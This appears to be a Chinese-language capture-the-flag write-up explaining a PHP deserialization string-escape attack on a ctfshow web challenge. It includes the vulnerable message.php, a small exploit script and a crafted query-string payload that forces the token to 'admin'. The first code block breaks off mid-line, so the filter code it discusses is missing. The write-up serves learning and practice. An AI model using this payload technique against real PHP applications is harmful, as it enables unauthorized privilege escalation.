php反序列化字串逃逸
php反序列字串逃逸
最近在做ctfshow上得web入門反序列化以及php特性的部分,講講反序列化字串逃逸把。`
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-03 02:37:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-03 16:05:38
# @message.php
# @email: [email protected]
# @link: https://ctfer.com
*/
error_reporting(0);
class 題的程式碼如上所示這程式碼的功能通過序列化以生成一段cookie,這個頁面上也沒有找到flag,看了下注釋發現了一個message.php訪問message.php
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-03 15:13:03
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-03 15:17:17
# @email: [email protected]
# @link: https://ctfer.com
*/
highlight_file(__FILE__);
include('flag.php');
class message{
public $from;
public $msg;
public $to;
public $token='user';
public function __construct($f,$m,$t){
$this->from = $f;
$this->msg = $m;
$this->to = $t;
}
}
if(isset($_COOKIE['msg'])){
$msg = unserialize(base64_decode($_COOKIE['msg']));
if($msg->token=='admin'){
echo $flag;
}
}
發現了這樣的程式碼,之前生成的cookie進行了反序列化,而要讀取flag需要token變為admin而之前的程式碼無法使得token通過直接賦值變成admin,那麼我們應該利用可以傳的引數將php序列化字串給拼接進而去傳token的值,先寫出exp
<?php
class message{
public $token="admin";
}
$a=new message();
echo serialize($a);
在反序列化得時候php會根據s所指定得字串長度去讀後面的字串.
對於這個O的含義是代表了一個物件而那個4代表了這個物件有多少屬性,我們可以傳入這樣的引數
?f=1&m=1&t=1fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}
index.php的程式碼上當匹配到fck時會把fck替換為loveU,而這樣傳是為了讓程式碼後半部分的token與admin擠掉token與user,從而完成了反序列化字串逃逸
沒有被替換的序列化字串
O:7:“message”:4:{s:4:“from”;s:1:“1”;s:3:“msg”;s:1:“1”;s:2:“to”;s:136:“1fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck”;s:5:“token”;s:5:“admin”;}";s:5:“token”;s:4:“user”;}PHP會認為s:136:“1fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck”;s:5:“token”;s:5:“admin”;}";這個部分一塊的